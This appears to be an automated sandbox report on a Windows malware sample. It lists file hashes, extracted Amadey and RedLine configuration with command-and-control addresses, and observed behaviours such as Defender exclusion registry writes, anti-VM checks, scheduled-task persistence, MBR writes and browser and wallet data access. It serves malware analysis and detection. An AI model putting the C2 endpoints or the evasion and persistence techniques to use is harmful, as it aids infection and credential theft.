Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
07-06-2024 21:25
Static task
static1
Behavioral task
behavioral1
Sample
33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe
Resource
win10v2004-20240426-en
General
-
Target
33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe
-
Size
1.8MB
-
MD5
10434b7a97d4f60d48e19108e7f3a8a6
-
SHA1
061c2fd699cc36137b5cd453766e752ea2d37222
-
SHA256
33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42
-
SHA512
eb64886dc8448ce056e0ed89c3b131e1638d6b995b567cf82d347f5ce8eaecc69c1f4d8ab71f03f38b97ea76ef4a009f45af3c8a61ad666207502923d3bdd943
-
SSDEEP
49152:VKX5TKr/w6XXihDUcTMbtyCdCtqqTrfL038e:VKBu/1XyhD9TMbtyCdCLTjLy
Malware Config
Extracted
amadey
8254624243
e76b71
http://77.91.77.81
-
install_dir
8254624243
-
install_file
axplong.exe
-
strings_key
90049e51fabf09df0d6748e0b271922e
-
url_paths
/Kiru9gu/index.php
Extracted
redline
newbild
185.215.113.67:40960
Signatures
-
Modifies firewall policy service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" HqA55f547cg1gL6v7PJmBsf8.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral1/files/0x0005000000019d59-419.dat family_redline behavioral1/memory/1932-429-0x0000000000A80000-0x0000000000AD0000-memory.dmp family_redline -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\voItHROCU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qfQXRdAKnlsTdhGWuTR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qfQXRdAKnlsTdhGWuTR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\voItHROCU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\xehfnPLREkljOutgp = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZzJFgnUaheUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\efSuucJNImPU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MlEwZvbgpCGVQFZq = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZzJFgnUaheUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\xehfnPLREkljOutgp = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MlEwZvbgpCGVQFZq = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\efSuucJNImPU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gWMsjtYByovYC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gWMsjtYByovYC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\WMmUhsrLoeNTYuVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\WMmUhsrLoeNTYuVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MlEwZvbgpCGVQFZq = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MlEwZvbgpCGVQFZq = "0" reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 114 3012 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs
Run Powershell and hide display window.
pid Process 2116 powershell.exe 2484 powershell.exe 320 powershell.exe 2880 powershell.exe 1960 powershell.exe 1104 powershell.EXE 1704 powershell.exe 2188 powershell.exe 1200 powershell.exe 1960 powershell.exe 2736 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Control Panel\International\Geo\Nation 360TS_Setup.exe Key value queried \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Control Panel\International\Geo\Nation eKfotrz.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l3kJrlRzf5aYNgrU71rvffbY.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3Z7bJqOm2oNNKv5MSoWa25Bi.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skcmwZhYKBmYgyWqHjdI0dGp.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DE3j0EMWRG4geykGf9BicXJx.bat regsvcs.exe -
Executes dropped EXE 27 IoCs
pid Process 2596 axplong.exe 792 file300un.exe 1248 gold.exe 1712 QpVB2zLMp5uymu8SyDWvJowq.exe 2700 HqA55f547cg1gL6v7PJmBsf8.exe 800 iw2rdwuO01Y7ysK806SnpS14.exe 672 Install.exe 2132 Install.exe 940 judit.exe 1932 redline123123.exe 1580 stub.exe 1396 upd.exe 1064 lumma123.exe 2332 EByWAxd.exe 1988 NewR.exe 1976 FirstZ.exe 1628 NewR.exe 1252 eKfotrz.exe 464 Process not Found 2580 reakuqnanrkn.exe 1640 setup222.exe 1472 whiteheroin.exe 2164 setup222.exe 272 360TS_Setup.exe 2580 360TS_Setup.exe 768 taskmanager.exe 2696 NewR.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Wine 33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe Key opened \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Wine axplong.exe -
Loads dropped DLL 64 IoCs
pid Process 2876 33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe 2596 axplong.exe 2596 axplong.exe 2596 axplong.exe 2280 regsvcs.exe 1712 QpVB2zLMp5uymu8SyDWvJowq.exe 2280 regsvcs.exe 2280 regsvcs.exe 800 iw2rdwuO01Y7ysK806SnpS14.exe 800 iw2rdwuO01Y7ysK806SnpS14.exe 800 iw2rdwuO01Y7ysK806SnpS14.exe 800 iw2rdwuO01Y7ysK806SnpS14.exe 672 Install.exe 672 Install.exe 672 Install.exe 672 Install.exe 2132 Install.exe 2132 Install.exe 2132 Install.exe 2596 axplong.exe 2596 axplong.exe 940 judit.exe 1580 stub.exe 2596 axplong.exe 2596 axplong.exe 2596 axplong.exe 2596 axplong.exe 1288 WerFault.exe 1288 WerFault.exe 1288 WerFault.exe 1304 WerFault.exe 1304 WerFault.exe 2596 axplong.exe 1304 WerFault.exe 1988 NewR.exe 1988 NewR.exe 1200 WerFault.exe 1200 WerFault.exe 1200 WerFault.exe 464 Process not Found 2596 axplong.exe 2596 axplong.exe 1472 whiteheroin.exe 1640 setup222.exe 1256 Process not Found 1712 QpVB2zLMp5uymu8SyDWvJowq.exe 1712 QpVB2zLMp5uymu8SyDWvJowq.exe 1712 QpVB2zLMp5uymu8SyDWvJowq.exe 1712 QpVB2zLMp5uymu8SyDWvJowq.exe 1256 Process not Found 1256 Process not Found 272 360TS_Setup.exe 272 360TS_Setup.exe 2580 360TS_Setup.exe 2580 360TS_Setup.exe 3012 rundll32.exe 3012 rundll32.exe 3012 rundll32.exe 3012 rundll32.exe 2776 WerFault.exe 2776 WerFault.exe 2776 WerFault.exe 2776 WerFault.exe 2776 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\file300un = "C:\\Users\\Admin\\file300un.exe" file300un.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json eKfotrz.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json eKfotrz.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 80 pastebin.com 6 pastebin.com 9 pastebin.com 48 iplogger.com 49 iplogger.com 79 pastebin.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 52 api.myip.com 53 api.myip.com 58 ipinfo.io 59 ipinfo.io -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 QpVB2zLMp5uymu8SyDWvJowq.exe File opened for modification \??\PhysicalDrive0 360TS_Setup.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini EByWAxd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA eKfotrz.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol HqA55f547cg1gL6v7PJmBsf8.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol EByWAxd.exe File opened for modification C:\Windows\system32\MRT.exe FirstZ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol eKfotrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA eKfotrz.exe File opened for modification C:\Windows\System32\GroupPolicy HqA55f547cg1gL6v7PJmBsf8.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini HqA55f547cg1gL6v7PJmBsf8.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI HqA55f547cg1gL6v7PJmBsf8.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe reakuqnanrkn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 eKfotrz.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA eKfotrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E eKfotrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 eKfotrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat eKfotrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA eKfotrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 eKfotrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E eKfotrz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 eKfotrz.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2876 33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe 2596 axplong.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 792 set thread context of 2280 792 file300un.exe 34 PID 2580 set thread context of 2260 2580 reakuqnanrkn.exe 303 PID 2580 set thread context of 1364 2580 reakuqnanrkn.exe 308 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\360\Total Security\i18n\vi\deepscan\art.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\filemon\AVLib.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\hi\safemon\wdk.ini 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\it\safemon\wdk.ini 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\ru\ipc\appmon.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\pt\ipc\360netr.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\de\ipc\360netd.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\pt\ipc\360netd.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\zh-TW\ipc\360netd.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\fr\safemon\CameraProtect\CameraGuard\bkg\pic_01.jpg 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\config\tools\nodes\FileSmasher.xml 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\ru\deepscan\dsconz.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\safemon\cuconfig.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\zh-TW\deepscan\dsconz.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\Utils\cef\2623\cef.pak 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\config\newui\themes\default\datashield_theme.xml 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\pt\deepscan\art.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\de\ipc\360netr.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\pl\safemon\bp.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\config\newui\themes\default\desktopplus_theme.xml 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\config\tools\nodes\DriverUpdater.xml 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\pl\safemon\wd.ini 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\config\tools\nodes\360SafeWallet.xml 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\config\tools\nodes\BrowserProtection.xml 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\config\tools\nodes\FirstPriorityUpdate.xml 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\config\tools\nodes\TraceClean.xml 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\ipc\360ipc.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\Utils\cef\2623\locales\en-US.pak 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\safemon\webprotection_firefox.xpi 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\config\tools\nodes\360NetRepair.xml 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\ipc\cleancfg.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\en\deepscan\dsr.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\en\safemon\bp.dat 360TS_Setup.exe File created C:\Program Files (x86)\gWMsjtYByovYC\GnyeHAU.dll eKfotrz.exe File created C:\Program Files (x86)\360\Total Security\i18n\vi\ipc\360ipc.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\vi\ipc\360netd.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\vi\safemon\CameraProtect\CameraGuard\bkg\pic_01.jpg 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\deepscan\dsark_win10.cat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\pl\ipc\appmon.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\ru\deepscan\art.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\it\safemon\bp.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\zh-CN\safemon\drvmon.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\zh-TW\deepscan\dsr.dat 360TS_Setup.exe File created C:\Program Files (x86)\ZzJFgnUaheUn\jZnFmgQ.dll eKfotrz.exe File created C:\Program Files (x86)\360\Total Security\i18n\pl\safemon\CameraProtect\CameraGuard\bkg\pic_01.jpg 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\zh-CN\ipc\appmon.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\ipc\clsid.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\tr\safemon\CameraProtect\CameraGuard\bkg\pic_01.jpg 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\tr\deepscan\art.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\deepscan\BlackMirror.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\act.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\softmgr\AdvUtils.ini 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\config\tools\nodes\FileProtector.xml 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\softmgr\optconfig.ini 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\pt\deepscan\dsr.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\es\ipc\360netd.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\it\ipc\360netd.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\it\deepscan\dsconz.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\deepscan\art.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\zh-CN\deepscan\art.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\i18n\es\safemon\bp.dat 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\Utils\cef\2623\cef_200_percent.pak 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\Utils\DesktopPlus\bell.wav 360TS_Setup.exe File created C:\Program Files (x86)\360\Total Security\config\newui\themes\default\360searchlite_theme.xml 360TS_Setup.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\Tasks\ceuxZEzDPWMxlYwWu.job schtasks.exe File created C:\Windows\Tasks\axplong.job 33714ad5a998983029e956d202963a3c2e05c9671033d2b4c50d6e5ebdfcdb42.exe File created C:\Windows\Tasks\bjPRdWxZxSSObMFEvg.job schtasks.exe File created C:\Windows\Tasks\IzaEPSfYdSgyWPrQW.job schtasks.exe File created C:\Windows\Tasks\HsFIJVFBpaOiSlL.job schtasks.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1864 sc.exe 2016 sc.exe 2220 sc.exe 2836 sc.exe 2536 sc.exe 1104 sc.exe 2972 sc.exe 2464 sc.exe 1372 sc.exe 1112 sc.exe 2264 sc.exe 1072 sc.exe 936 sc.exe 472 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
pid pid_target Process procid_target 1288 1396 WerFault.exe 74 1304 1064 WerFault.exe 81 1200 2332 WerFault.exe 82 2776 2132 WerFault.exe 43 2264 1252 WerFault.exe 218 -
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1408 schtasks.exe 2656 schtasks.exe 2036 schtasks.exe 2856 schtasks.exe 1544 schtasks.exe 532 schtasks.exe 1784 schtasks.exe 2444 schtasks.exe 1188 schtasks.exe 1648 schtasks.exe 2016 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
